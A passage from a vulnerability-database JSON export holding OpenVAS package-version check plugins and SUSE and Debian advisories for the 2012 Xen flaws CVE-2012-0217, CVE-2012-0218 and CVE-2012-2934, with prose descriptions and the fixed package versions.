See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\");\n script_id(864509);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:35:18 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-9386\");\n script_name(\"Fedora Update for xen FEDORA-2012-9386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~20.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "Check for the Version of xen", "modified": "2017-12-29T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:864599", "href": "http://plugins.openvas.org/nasl.php?oid=864599", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 17\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_id(864599);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625", "CVE-2012-3432"], "description": "The remote host is missing an update for the 'xen' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-08-30T00:00:00", "id": "OPENVAS:1361412562310864599", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864599", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-11182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-11182\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-August/084648.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864599\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:22:33 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\", \"CVE-2012-2625\",\n \"CVE-2012-3432\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-11182\");\n script_name(\"Fedora Update for xen FEDORA-2012-11182\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"xen on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~24.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:1361412562310864494", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864494", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9399", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864494\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:34:52 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n script_name(\"Fedora Update for xen FEDORA-2012-9399\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xen'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xen on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 
\"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2018-01-11T11:07:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "description": "Check for the Version of xen", "modified": "2018-01-10T00:00:00", "published": "2012-06-28T00:00:00", "id": "OPENVAS:864494", "href": "http://plugins.openvas.org/nasl.php?oid=864494", "type": "openvas", "title": "Fedora Update for xen FEDORA-2012-9399", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xen FEDORA-2012-9399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xen on Fedora 16\";\ntag_insight = \"This package contains the XenD daemon and xm command line\n tools, needed to manage virtual machines running under the\n Xen hypervisor\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\");\n script_id(864494);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-28 10:34:52 +0530 (Thu, 28 Jun 2012)\");\n script_cve_id(\"CVE-2012-2625\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\",\n \"CVE-2012-0029\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-9399\");\n script_name(\"Fedora Update for xen FEDORA-2012-9399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xen\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xen\", rpm:\"xen~4.1.2~8.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.4, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:07:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "description": "Check for the Version of kernel", "modified": "2018-01-05T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881107", "href": "http://plugins.openvas.org/nasl.php?oid=881107", "type": "openvas", "title": "CentOS Update for kernel CESA-2012:0721 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2012:0721 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issues:\n \n * It was found that the Xen hypervisor implementation as shipped with Red\n Hat Enterprise Linux 5 did not properly restrict the syscall return\n addresses in the sysret return path to canonical addresses. An unprivileged\n user in a 64-bit para-virtualized guest, that is running on a 64-bit host\n that has an Intel CPU, could use this flaw to crash the host or,\n potentially, escalate their privileges, allowing them to execute arbitrary\n code at the hypervisor level. (CVE-2012-0217, Important)\n \n * It was found that guests could trigger a bug in earlier AMD CPUs, leading\n to a CPU hard lockup, when running on the Xen hypervisor implementation. An\n unprivileged user in a 64-bit para-virtualized guest could use this flaw to\n crash the host. Warning: After installing this update, hosts that are using\n an affected AMD CPU (refer to Red Hat Bugzilla bug #824966 for a list) will\n fail to boot. In order to boot such hosts, the new kernel parameter,\n allow_unsafe, can be used ("allow_unsafe=on"). This option should only be\n used with hosts that are running trusted guests, as setting it to "on"\n reintroduces the flaw (allowing guests to crash the host). 
(CVE-2012-2934,\n Moderate)\n \n Note: For Red Hat Enterprise Linux guests, only privileged guest users can\n exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n \n Red Hat would like to thank the Xen project for reporting these issues.\n Upstream acknowledges Rafal Wojtczuk as the original reporter of\n CVE-2012-0217.\n \n Users should upgrade to these updated packages, which contain backported\n patches to correct these issues. The system must be rebooted for this\n update to take effect.\";\n\ntag_affected = \"kernel on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-June/018678.html\");\n script_id(881107);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:09:17 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-2934\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0721\");\n script_name(\"CentOS Update for kernel CESA-2012:0721 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~308.8.2.el5\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": 
[{"lastseen": "2016-09-04T12:05:35", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "This update of XEN fixed multiple security flaws that could\n be exploited by local attackers to cause a Denial of\n Service or potentially escalate privileges. Additionally,\n several other upstream changes were backported.\n\n", "edition": 1, "modified": "2012-07-18T15:08:32", "published": "2012-07-18T15:08:32", "id": "OPENSUSE-SU-2012:0886-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00008.html", "type": "suse", "title": "xen (critical)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "Three security issues were found in XEN.\n\n Two security issues are fixed by this update:\n\n *\n\n CVE-2012-0217: Due to incorrect fault handling in the\n XEN hypervisor it was possible for a XEN guest domain\n administrator to execute code in the XEN host environment.\n\n *\n\n CVE-2012-0218: Also a guest user could crash the\n guest XEN kernel due to a protection fault bounce.\n\n The third fix is changing the Xen behaviour on certain\n hardware:\n\n *\n\n CVE-2012-2934: The issue is a denial of service issue\n on older pre-SVM AMD CPUs (AMD Erratum 121).\n\n AMD Erratum #121 is described in "Revision Guide for\n AMD Athlon 64 and AMD Opteron Processors":\n <a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>\n <<a rel=\"nofollow\" href=\"http://support.amd.com/us/Processor_TechDocs/25759.pdf\">http://support.amd.com/us/Processor_TechDocs/25759.pdf</a>>\n\n The following 130nm and 90nm (DDR1-only) AMD\n processors are subject to this erratum:\n\n o\n\n First-generation AMD-Opteron(tm) single and\n dual core processors in either 
939 or 940 packages:\n\n + AMD Opteron(tm) 100-Series Processors\n + AMD Opteron(tm) 200-Series Processors\n + AMD Opteron(tm) 800-Series Processors\n + AMD Athlon(tm) processors in either 754,\n 939 or 940 packages\n + AMD Sempron(tm) processor in either 754\n or 939 packages\n + AMD Turion(tm) Mobile Technology in 754\n package\n\n This issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except\n by upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guest systems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option "allow_unsafe" for\n GRUB which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line\n looking like this:\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing\n boot options for the host.\n", "edition": 1, "modified": "2012-06-12T23:08:27", "published": "2012-06-12T23:08:27", "id": "SUSE-SU-2012:0730-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-06/msg00008.html", "title": "Security update for Xen (critical)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-11-11T13:16:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2501-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJune 24, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : xen\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217 CVE-2012-0218 CVE-2012-2934\n\nSeveral vulnerabilities were discovered in Xen, a hypervisor.\n\nCVE-2012-0217\n\tXen does not properly handle uncanonical return addresses on\n\tIntel amd64 CPUs, allowing amd64 PV guests to elevate to\n\thypervisor privileges. 
AMD processors, HVM and i386 guests\n\tare not affected.\n\nCVE-2012-0218\n\tXen does not properly handle SYSCALL and SYSENTER instructions\n\tin PV guests, allowing unprivileged users inside a guest\n\tsystem to crash the guest system.\n\nCVE-2012-2934\n\tXen does not detect old AMD CPUs affected by AMD Erratum #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the "allow_unsafe" option is passed.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version\n4.1.3~rc1+hg-20120614.a9c0a89c08f2-1.\n\nWe recommend that you upgrade your xen packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2012-06-24T15:22:55", "published": "2012-06-24T15:22:55", "id": "DEBIAN:DSA-2501-1:A44C3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00140.html", "title": "[SECURITY] [DSA 2501-1] xen security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:20:21", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2508-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nJuly 22, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : kfreebsd-8\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE ID : CVE-2012-0217\nDebian Bug : 677297\n\nRafal Wojtczuk from Bromium discovered that FreeBSD wasn't handling 
correctly\nuncanonical return addresses on Intel amd64 CPUs, allowing privilege escalation\nto kernel for local users.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 8.1+dfsg-8+squeeze3.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 8.3-4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.3-4.\n\nWe recommend that you upgrade your kfreebsd-8 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2012-07-22T12:23:05", "published": "2012-07-22T12:23:05", "id": "DEBIAN:DSA-2508-1:4DE0E", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00155.html", "title": "[SECURITY] [DSA 2508-1] kfreebsd-8 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2625", "CVE-2012-2934"], "description": "This package contains the XenD daemon and xm command line tools, needed to manage virtual machines running under the Xen hypervisor ", "modified": "2012-06-26T00:52:23", "published": 